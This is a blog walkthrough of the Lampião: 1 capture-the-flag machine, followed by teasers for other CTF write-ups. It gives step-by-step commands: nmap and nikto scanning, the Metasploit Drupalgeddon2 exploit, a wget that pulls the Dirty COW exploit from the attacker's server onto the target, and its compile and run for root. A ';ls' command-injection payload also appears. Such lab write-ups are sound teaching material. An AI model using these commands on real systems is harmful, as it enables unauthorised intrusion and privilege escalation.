Lampião: 1

Lab Environment
Attacker's Machine - Linux kali 4.18.0-kali1-amd64 #1 SMP Debian 4.18.6-1kali1 (2018-09-10) x86_64 GNU/Linux
Vulnerable Machine - Lampião: 1
Proof Of Concept
Scanning Phase
arp-scan --local (to scan for the machines connected to the network)
vulnerable machine IP - 192.168.43.17

Now i will use nmap for further scanning the machine's IP

nmap -p -Pn 192.168.43.17

Now i tried to access the IP on port 1898


Further i used nikto for further enumeration

Syntax for nikto : nikto -h 192.168.43.17:1898
Useful result : drupal 7 is installed


So i tried to search the exploits of drupal 7 on exploit-db , and found the exploit.
Exploit : drupalgeddon2
Which is already present in my machine.

I fired up msfconsole to use drupalgeddon2 on target machine
Syntax to search exploit in msfconsole : search exploit name


Now i have to use the exploit
Syntax to use the exploit : use exploit/unix/webapp/drupal_drupalgeddon2

Now i have to provide certain requirements of exploit so as to exploit target IP
Syntax to explore the requirements of exploit : show options OR options


Now set the required fields as follows :
set RHOST 192.168.43.17
set  RPORT 1898
After providing the necessary requirements just run the exploit
Syntax to run the exploit : exploit
And got the meterpreter session



Then further entered the shell by simply typing shell in meterpreter


Then i was unable to open the root directory as i was not having enough permissions .
So i understood that have to do escalate the privileges .
So i entered n tmp directory and found the info of target machine by just typing uname -a
I get to know that target machine is ubuntu 14.04 LTS
So i downloaded dirty cow exploit to escalate privileges for the target machine from exploit-db(https://www.exploit-db.com/exploits/40847/)

Now i started python server on my attacking machine so as to transfer the 40847.cpp to target machine .

Command used to download file in target machine from server
Command : wget http://attacker’s machine ip in which file is originally downloaded/Downloads/40847.cpp

After it has been downloaded to the tmp directory of target machine ,i ran it simply by using the following commands.
Command : 1) g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
           2)./dcow -s
And finally got the flag


   
                                            Video Tutorial 

 


Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more